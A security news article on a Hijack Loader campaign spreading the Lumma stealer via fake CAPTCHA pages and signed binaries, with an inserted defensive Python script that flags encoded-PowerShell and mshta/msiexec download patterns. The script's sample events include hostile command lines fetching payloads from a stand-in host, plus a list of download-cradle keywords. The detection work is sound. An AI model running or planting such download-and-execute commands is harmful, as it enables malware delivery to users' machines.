Cybersecurity experts have uncovered a new malware campaign that deploys Hijack Loader, a malicious program signed with legitimate code-signing certificates. The attack, detected earlier this month, is aimed at distributing an information-stealing malware called Lumma.
Hijack Loader, also known as DOILoader, first emerged in September 2023. Attackers often trick users into downloading this malware by disguising it as pirated software or media.
Recent variations of this campaign have become more sophisticated, directing victims to fake CAPTCHA pages. These pages prompt users to copy and run an encoded PowerShell command, which delivers the malware as a ZIP archive.
Researchers have observed multiple forms of this PowerShell-based attack since mid-September 2024. Some of these versions exploit legitimate tools such as `mshta.exe` and `msiexec.exe` to download and execute malware from remote servers.
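As an added example, not code from the article or the researchers it cites, the following Python triages process-creation records for the two delivery patterns described above: a PowerShell `-EncodedCommand` argument that decodes to a download cradle, and `mshta.exe` or `msiexec.exe` invoked with a remote URL. The record format (parent image plus command line, as an EDR or Sysmon Event ID 1 would log it), the sample command lines and the `example.invalid` host are all constructed for this example.

```python
import base64
import re

# Flags PowerShell accepts for a base64 (UTF-16LE) encoded command. PowerShell
# also accepts other unambiguous prefixes of -EncodedCommand; these are the
# spellings most commonly seen in pasted commands.
ENCODED_FLAG_RE = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# Tokens in the decoded script that indicate a download cradle or a hand-off
# to another living-off-the-land binary.
CRADLE_RE = re.compile(
    r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|"
    r"downloadfile|net\.webclient|start-bitstransfer|iex|invoke-expression|"
    r"mshta|msiexec)\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)
LOLBINS = ("mshta.exe", "msiexec.exe")

# Constructed sample events (parent image, command line). The first three model
# the chain in the article: a pasted encoded PowerShell download, and mshta /
# msiexec pulling content from a remote server. The last two are benign.
SAMPLE_EVENTS = [
    ("explorer.exe",
     "powershell.exe -w hidden -ep bypass -enc " + base64.b64encode(
         "iwr http://example.invalid/a.zip -o $env:TEMP\\a.zip".encode("utf-16-le")
     ).decode()),
    ("explorer.exe", "mshta.exe http://example.invalid/x.hta"),
    ("explorer.exe", "msiexec.exe /q /i http://example.invalid/pkg.msi"),
    ("explorer.exe", "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"),
    ("services.exe", "msiexec.exe /i C:\\installers\\app.msi /qn"),
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent or undecodable."""
    m = ENCODED_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        # PowerShell expects the blob to be base64 over UTF-16LE text.
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(parent, cmdline):
    """Return the list of reasons this event is suspicious (empty if none)."""
    reasons = []
    image = cmdline.split()[0].lower()
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded PowerShell command")
        if CRADLE_RE.search(decoded):
            reasons.append("decoded command contains a download/execution cradle")
    if image.endswith(LOLBINS) and URL_RE.search(cmdline):
        reasons.append(f"{image} given a remote URL")
    if reasons and parent.lower() == "explorer.exe":
        # A user pasting into the Run dialog or a shell yields explorer.exe as
        # parent, consistent with the fake-CAPTCHA lure described above.
        reasons.append("launched interactively (parent explorer.exe)")
    return reasons


def triage(events):
    """Return [(cmdline, reasons)] for every event that raised at least one reason."""
    results = []
    for parent, cmdline in events:
        reasons = analyse_event(parent, cmdline)
        if reasons:
            results.append((cmdline, reasons))
    return results


if __name__ == "__main__":
    for cmdline, reasons in triage(SAMPLE_EVENTS):
        print(cmdline[:60], "->", "; ".join(reasons))
```

Decoding the blob before matching matters: the base64 text itself carries no useful keywords, and a rule that only fires on `-enc` will also hit the administrative scripts that use it legitimately. The parent-process check is a weak signal on its own and is only attached once another reason exists.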
The ZIP file contains a legitimate executable vulnerable to DLL side-loading together with a malicious DLL (Hijack Loader) that decrypts and runs the final payload, which in turn downloads and executes the Lumma information stealer.
Interestingly, in October 2024, the delivery method shifted to using signed binaries to avoid detection. While it’s unclear if the certificates used were stolen or intentionally generated by the attackers, experts believe the latter is possible.
The certificates have since been revoked, but the case highlights how malware can be signed, demonstrating that code signatures are not always reliable indicators of software trustworthiness.
This discovery comes as other malware threats, such as the trojan CoreWarrior and the commodity malware XWorm, continue to spread. Phishing campaigns have been using XWorm to infect systems by delivering a PowerShell script disguised as a Windows Script File (WSF).
The latest version of XWorm, version 5.6, includes advanced capabilities like screenshot collection, denial-of-service (DoS) attacks, and tampering with host files, making it a potent tool for cybercriminals.
To prevent falling victim to malware like Hijack Loader and XWorm, organizations should adopt advanced endpoint detection and response (EDR) systems and regularly update their security software. Avoid downloading software from unverified sources and always verify the legitimacy of files, even if they appear to be signed.